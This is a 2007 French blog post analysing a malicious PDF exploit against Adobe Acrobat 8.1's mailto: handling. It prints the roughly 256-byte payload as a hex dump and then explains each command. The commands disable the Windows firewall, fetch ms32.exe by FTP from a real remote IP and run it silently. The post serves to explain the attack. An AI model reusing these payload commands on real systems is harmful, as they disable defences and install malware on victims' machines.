01-11-2007 - Les nouvelles joies des fichiers PDF

Une vague de fichiers PDF infectés en apparue cette semaine, touchant les utilisateurs de Windows ayant Adobe Acrobat 8.1. Le virus utilisait une faille dans l'option mailto: de ces logiciels.
Le code de cet exploit tenait en moins de 256 octets: désactiver le firewall de windows, télécharger le fichier via le protocole FTP et l'exécuter sur l'ordinateur:

52 49 28 6D 61 69 6C 74-6F 3A 25 2F 2E 2E 2F 2E "RI(mailto:%/../."
2E 2F 2E 2E 2F 2E 2E 2F-2E 2E 2F 2E 2E 2F 77 69 "./../../../../wi"
6E 64 6F 77 73 2F 73 79-73 74 65 6D 33 32 2F 63 "ndows/system32/c"
6D 64 22 2E 65 78 65 22-22 20 2F 63 20 2F 71 20 "md".exe"" /c /q "
5C 22 40 6E 65 74 73 68-20 66 69 72 65 77 61 6C "\"@netsh firewal"
6C 20 73 65 74 20 6F 70-6D 6F 64 65 20 6D 6F 64 "l set opmode mod"
65 3D 64 69 73 61 62 6C-65 26 40 65 63 68 6F 20 "e=disable&@echo "
6F 20 32 30 33 2E 31 32-31 2E 36 39 2E 31 31 36 "o 203.121.69.116"
3E 37 26 40 65 63 68 6F-20 62 69 6E 61 72 79 3E ">7&@echo binary>"
3E 37 26 40 65 63 68 6F-20 67 65 74 20 2F 6D 73 ">7&@echo get /ms"
33 32 2E 65 78 65 3E 3E-37 26 40 65 63 68 6F 20 "32.exe>>7&@echo "
71 75 69 74 3E 3E 37 26-40 66 74 70 20 2D 73 3A "quit>>7&@ftp -s:"
37 20 2D 76 20 2D 41 3E-6E 75 6C 26 40 64 65 6C "7 -v -A>nul&@del"
20 2F 71 20 37 26 40 73-74 61 72 74 20 6D 73 33 " /q 7&@start ms3"
32 2E 65 78 65 26 5C 22-20 5C 22 26 5C 22 20 22 "2.exe&\" \"&\" ""
63 6F 6E 2E 63 6D 64 29-2F 53 2F 55 52 49 3E 3E "con.cmd)/S/URI>>"

Petites explications:

-lancement de l'interpréteur de commande cmd.exe. L'option /c permet de le stopper une fois que la suite aura été exécutée, et l'option /q de n'afficher aucun message pendant l'exécution:
/windows/system32/cmd.exe /c /q

-désactivation du firewall de Windows:
@netsh firewall set opmode mode=disable

-copie les commandes FTP a exécuter dans un fichier nommer "7":
-connexion au serveur distant:
@echo o 203.121.69.116>7
-mode de transfert binaire:
@echo binary>>7
-récupération du fichier ms32.exe à la racine du répertoire:
@echo get /ms32.exe>>7
-fermeture de la connexion:
@echo quit>>7

-connexion au serveur FTP en utilisant les commandes ci-dessus enregistrées dans le fichier "7", en toute discrétion (-v) et en utilisant n'importe quelle interface (-a):
@ftp -s:7 -v -A>nul

-suppresion du fichier "7":
@del /q 7

-exécution du fichier téléchargé:
@start ms32.exe

On voit que l'auteur a utilisé le maximum (voire même presque trop) de précautions pour que toute la procédure soit transparente (@ en début de lignes pour echo off, redirection sur >nul, paramètres /q -v), mais malheureusement pour lui, il n'avait sans doute pas prévu que le serveur utilisé pour téléchargé le petit exécutable win32, situé en Malaisie, serait si rapidement fermé. Il faut dire aussi que ce serveur avait tout de même un accès FTP ouvert à toutes et à tous...